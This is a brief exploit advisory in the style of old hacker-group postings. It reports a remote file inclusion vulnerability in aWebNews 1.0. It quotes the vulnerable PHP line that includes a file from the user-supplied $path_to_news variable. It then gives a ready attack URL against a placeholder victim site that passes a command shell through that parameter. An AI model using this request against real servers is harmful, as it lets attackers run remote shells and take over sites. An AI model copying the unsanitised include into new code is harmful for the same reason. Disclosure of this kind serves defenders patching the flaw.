SaVSaK.CoM | SpC-x - The-BeKiR |

aWebNews 1.0 version - Remote File Include Vulnerabilities

Risk : High

Class: Remote

Script : aWebNews

Credits : SpC-x

Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx

Code :

include "" . $path_to_news . "config.php";

$db = mysql_connect($db_host,$db_user,$db_pass);

Vulnerable :

http://www.victim.com/aWebNews/visview.php?path_to_news=Command-Shell